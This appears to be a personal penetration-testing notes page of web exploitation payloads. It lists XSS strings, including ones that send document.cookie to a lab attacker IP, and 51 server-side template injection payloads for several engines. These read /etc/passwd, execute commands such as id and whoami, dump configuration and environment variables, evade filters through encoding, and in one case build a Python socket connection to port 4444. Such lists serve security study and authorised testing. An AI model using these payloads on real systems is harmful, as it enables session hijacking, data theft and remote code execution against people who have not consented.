// notes/ Web Exploitation
🕸️

XSS

<pre<code<strong&#x3C;scriptprompt(1)&#x3C;/script

#web applications#adot8
source · oscp.adot8.com · web-applications/xxs

XXS

<pre><code><strong>&#x3C;script>prompt(1)&#x3C;/script> </strong>&#x3C;script>alert(1)&#x3C;/script> &#x3C;img src="x" onerror="prompt(1)"> &#x3C;img src="x" onerror="document.location='https://cheese.com'"> &#x3C;img src="x" onerror="window.location.href='https://tcm-sec.com'"> &#x3C;img src='x' onerror='alert(document.cookie)'> &#x3C;img src=x onerror="this.src='https://10.10.14.10/?'+document.cookie; this.removeAttribute('onerror');"> &#x3C;script>var i = new Image; i.src="https://10.10.14.10/?"+document.cookie;&#x3C;/script> </code></pre>

{% embed url="https://github.com/payloadbox/ssti-payloads?source=post_page-----a493c71355ac--------------------------------" %}

code
01{{2*2}}[[3*3]]
02{{3*3}}
03{{3*'3'}}
04<%= 3 * 3 %>
05${6*6}
06${{3*3}}
07@(6+5)
08#{3*3}
09#{ 3 * 3 }
10*{7*7}
11{{dump(app)}}
12{{app.request.server.all|join(',')}}
13{{config.items()}}
14{{ [].class.base.subclasses() }}
15{{''.class.mro()[1].subclasses()}}
16{{ ''.__class__.__mro__[2].__subclasses__() }}
17{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
18{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
19{{'a'.toUpperCase()}}
20{{ request }}
21{{self}}
22<%= File.open('/etc/passwd').read %>
23<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
24[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
25${"freemarker.template.utility.Execute"?new()("id")}
26{{app.request.query.filter(0,0,1024,{'options':'system'})}}
27{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
28{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
29{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
30{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
31{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
32{$smarty.version}
33{php}echo `id`;{/php}
34{{['id']|filter('system')}}
35{{['cat\x20/etc/passwd']|filter('system')}}
36{{['cat$IFS/etc/passwd']|filter('system')}}
37{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
38{{request|attr(["_"*2,"class","_"*2]|join)}}
39{{request|attr(["__","class","__"]|join)}}
40{{request|attr("__class__")}}
41{{request.__class__}}
42{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
43{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
44{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
45{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
46{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
47{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
48*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
49${T(java.lang.System).getenv()}
50${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
51${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}